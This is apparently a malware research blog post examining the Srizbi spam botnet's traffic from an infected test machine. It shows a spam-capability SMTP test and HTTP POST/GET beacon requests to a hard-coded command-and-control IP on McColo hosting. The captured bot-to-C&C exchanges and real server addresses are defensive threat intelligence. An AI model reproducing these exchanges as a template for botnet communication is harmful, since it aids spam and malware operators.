McColo hosting Srizbi C&C

We've written about McColo hosting the Srizbi Command and Control servers a couple times, but today I saw a fun wrinkle that I haven't seen before.

After my machine got infected, it went through the standard connectivity test.  The first test was the standard "can I send SPAM?" test that Bots do - ie, the outbound port 25 check.  However, when I took a closer look at the SPAM test, the test domain is also hosted by McColo!

EHLO pur3.pwnag3.com

MAIL From:<a_fake_address@pickedbysrizbi.com>

RCPT To:<[blocked]@bestyounggirls.com>

DATA

Above you see Srizbi sending a blank message to [blocked]@bestyounggirls.com, and the IP it relayed it through was 208.72.168.85.  A quick 'dig' of bestyounggirls.com (NSFW) shows that it also resolves to 208.72.168.85.  The explaination is that Srizbi wanted to see if the Botted machine had the ability to send SPAM, so it sent a SPAM message to a domain that was controlled by the group who runs the Botnet.  If the Botted machine was not able to send SPAM, there's no need for it to try and possibly be detected by the systems administrator of its network.

After it does the SPAM test, you can see the normal Srizbi communication, again, on a different McColo IP (I altered the headers to take away identifyable information)

POST /r/A1412B-12F1E6-A55215 HTTP/1.1

Host: 208.72.169.212

Content-Length: 22587

X-Flags: 1

X-TM: 8321062925

X-BI: JFINIO2532NEIS9080324FS902319

X-PH: 0

X-TI: 189048209184.526.5323.121.412.9

After the POST (and the Bot sends up a couple hundred K of data), it does a GET and exchanges more data

GET /g/A9123B-98F13R1-A011N12 HTTP/1.1

Host: 208.72.169.212

X-Flags: 1

X-TM: 124908124

X-BI: DJK321N3091IOJOSF901FDS83923F

X-PH: 0

A quick google shows very little information for 208.72.169.212, despite the fact that it is hard coded into Srizbi.  No "fast flux" in use here!  The last interesting wrinkle about this is that it is communicating over both UDP and TCP on port 18923.

Alex Lanstein @ FireEye Malware Intelligence Labs

Comments/Questions to fgong@fireeye.com